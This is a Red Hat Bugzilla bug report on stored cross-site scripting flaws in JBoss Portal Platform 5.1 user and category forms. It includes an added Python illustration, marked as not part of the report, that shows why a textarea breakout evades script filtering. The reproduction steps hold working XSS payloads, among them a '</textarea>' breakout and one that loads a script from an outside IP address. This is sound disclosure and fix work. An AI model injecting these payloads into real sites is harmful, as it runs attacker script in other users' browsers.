Bug 793777 (JBEPP-847) - GTNPORTAL-1830 Cross Site Scripting vulnerabilities in user forms
Summary: GTNPORTAL-1830 Cross Site Scripting vulnerabilities in user forms
Keywords:
Status: CLOSED NEXTRELEASE
Alias: JBEPP-847
Product: JBoss Enterprise Portal Platform 5
Classification: JBoss
Component: unspecified
Version: 5.1.0.GA
Hardware: Unspecified
OS: Unspecified
Priority: high
Severity: high
Target Milestone: ---
: 5.1.1.DEV01
Assignee: hfnukal@redhat.com
QA Contact:
URL: http://jira.jboss.org/jira/browse/JBE...
Whiteboard:
Depends On:
Blocks:
Reported: 2011-03-08 23:22 UTC by Gary Hu
Modified: 2012-02-28 16:39 UTC (History)
6 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2011-07-08 08:36:18 UTC
Type: Bug




Links
System ID | Private | Priority | Status | Summary | Last Updated
Red Hat Bugzilla 793517 | 0 | high | CLOSED | XSS issue in dashboard new page creation | 2021-02-22 00:41:40 UTC
Red Hat Issue Tracker GTNPORTAL-1830 | 0 | Major | Resolved | Cross Site Scripting vulnerabilities in user forms | 2013-02-17 06:37:27 UTC
Red Hat Issue Tracker JBEPP-847 | 0 | Major | Closed | GTNPORTAL-1830 Cross Site Scripting vulnerabilities in user forms | 2013-02-17 06:37:27 UTC

Internal Links: 793517

Description Gary Hu 2011-03-08 23:22:01 UTC
Help Desk Ticket Reference: https://na7.salesforce.com/500A0000006k4Pm
project_key: JBEPP

A user can place html or javascript as their first or last name causing a viewing user to execute said code. This may happen during user modification or in other actions. Other inputs may be vulnerable as well.

To reproduce this on the EPP 5.1 out of box installation:

1) login as root
2) go to "Users and groups management"
3) under "User Management" click the "Edit User Info" icon
4) In the "First Name" or "Last Name" field type in something like "<script>alert("hello");</script>".
5) click the "Save" button. The javascript is executed and a pop up shows up.

Comment 1 Gary Hu 2011-03-08 23:22:30 UTC
Link: Added: This issue Cloned to GTNPORTAL-1830


Comment 2 Prabhat Jha 2011-03-09 03:36:58 UTC
Security: Removed: Public Added: RHT+eXo


Comment 3 hfnukal@redhat.com 2011-03-23 09:36:00 UTC
Link: Added: This issue is related to JBEPP-597


Comment 6 hfnukal@redhat.com 2011-04-19 15:27:16 UTC
Release Notes Text: Added: Text is escaped and no script is executed.


Comment 7 Bruno Machado 2011-06-30 21:02:24 UTC
I've received a new case about a similar issue and I tested it using epp-5.1.1.DEV01. When I type something like "<script>alert("hello");</script>" the script isn't executed. But, when I type something like "Dashboard</textarea><script>alert("Bad XSS");</script>", the script is still executed.

Ticket link: https://c.na7.visual.force.com/apex/Case_View?id=500A0000007CtcY&sfdc.override=1

Comment 8 Bruno Machado 2011-06-30 21:12:14 UTC
Also tested the value "Dashboard</textarea><script>alert("Bad XSS");</script>" in RH03, the script was executed and the "Bad XSS" message was shown.

Steps to reproduce:

1. login as root
2. Group -> Administration -> Application Registry
3. Edit Category
4. Type at the "Description" field the following:

Dashboard</textarea><script src=\\3.211.64.16\xsrf\a.js>

or

Dashboard</textarea><script>alert("Bad XSS");</script>

5. Click on Save button.
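The following Python script is an added illustration and is not code from this bug report, from GateIn or from EPP. It models the two behaviours seen above: the description's user-form case, where an unescaped first name lands in element content and the <script> runs, and Comments 7 and 8, where a bare <script> typed into the category description looks harmless but "Dashboard</textarea><script>…" still runs. The reason is that <textarea> content is RCDATA in the HTML tokeniser, so a "<script>" inside it is inert text until a "</textarea>" end tag closes the element; stripping or filtering "<script>" alone therefore proves nothing. The render_* templates are hypothetical stand-ins for the portal's views, the payloads are constructed to mirror the strings quoted in the report, and script_would_execute is a deliberately small model of the tokeniser that only knows about textarea and element content.

```python
import html
import re

# Constructed payloads mirroring the two strings quoted in the report
# (not the reporters' actual test data).
PAYLOAD_SCRIPT = '<script>alert("hello");</script>'
PAYLOAD_BREAKOUT = 'Dashboard</textarea><script>alert("Bad XSS");</script>'


# --- Stand-in templates (hypothetical; not the EPP/GateIn templates) ---------

def render_user_list_unescaped(first_name: str) -> str:
    """Pre-fix behaviour from the description: the name is written into
    element content verbatim, so a <script> in it becomes real markup."""
    return f'<table><tr><td>{first_name}</td></tr></table>'


def render_user_list_escaped(first_name: str) -> str:
    """The fix noted in Comment 6: HTML-escape the value before emitting it."""
    return f'<table><tr><td>{html.escape(first_name)}</td></tr></table>'


def render_category_form_unescaped(description: str) -> str:
    """Category description echoed back into a <textarea> unescaped.
    A bare <script> here is inert text (RCDATA), but a user-supplied
    '</textarea>' closes the element and the rest is parsed as markup."""
    return f'<textarea name="description">{description}</textarea>'


def render_category_form_escaped(description: str) -> str:
    """Escaping '<' as '&lt;' means no user-supplied '</textarea>' can close
    the element; the browser decodes the entity for display only."""
    return f'<textarea name="description">{html.escape(description)}</textarea>'


# --- Minimal model of how the HTML tokeniser treats these regions ------------

_TEXTAREA_OPEN = re.compile(r'<textarea\b[^>]*>', re.IGNORECASE)
_TEXTAREA_CLOSE = re.compile(r'</textarea\s*>', re.IGNORECASE)
_SCRIPT_OPEN = re.compile(r'<script\b', re.IGNORECASE)


def script_would_execute(doc: str) -> bool:
    """Return True if a <script> start tag appears in a region the tokeniser
    treats as markup, i.e. outside <textarea>...</textarea>. Small on purpose:
    it models only textarea and element content, which is enough to explain
    the observations in this report (not attribute, <title> or <style>)."""
    pos = 0
    while True:
        opener = _TEXTAREA_OPEN.search(doc, pos)
        markup_end = opener.start() if opener else len(doc)
        if _SCRIPT_OPEN.search(doc, pos, markup_end):
            return True
        if opener is None:
            return False
        closer = _TEXTAREA_CLOSE.search(doc, opener.end())
        if closer is None:
            return False  # unterminated textarea swallows the rest as text
        pos = closer.end()


if __name__ == "__main__":
    cases = [
        ("user list, unescaped, <script>", render_user_list_unescaped(PAYLOAD_SCRIPT)),
        ("user list, escaped, <script>", render_user_list_escaped(PAYLOAD_SCRIPT)),
        ("textarea, unescaped, <script>", render_category_form_unescaped(PAYLOAD_SCRIPT)),
        ("textarea, unescaped, breakout", render_category_form_unescaped(PAYLOAD_BREAKOUT)),
        ("textarea, escaped, breakout", render_category_form_escaped(PAYLOAD_BREAKOUT)),
    ]
    for label, doc in cases:
        print(f"{label:32s} executes={script_would_execute(doc)}")
```

The case worth noticing is the third one: the unescaped textarea reports no execution for the plain <script> payload, which is exactly the false negative in Comment 7. Any test plan for this class of bug should therefore include an end-tag breakout for the element the value is rendered into, not just a <script> tag, and the fix is output encoding for that context rather than filtering of specific tags.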

Comment 9 Thomas Heute 2011-07-08 08:36:18 UTC
Reclose the issue.
This one was about User form, and the case that reopened it is about category description, I opened a separate Jira: JBEPP-997

Comment 10 Scott Mumford 2011-07-11 01:36:23 UTC
Release Notes Docs Status: Added: Not Required
Release Notes Text: Removed: Text is escaped and no script is executed. Added: Included in the Release Note for JBEPP-598


Comment 11 hfnukal@redhat.com 2011-09-07 16:19:04 UTC
Security: Removed: RHT+eXo Added: Public


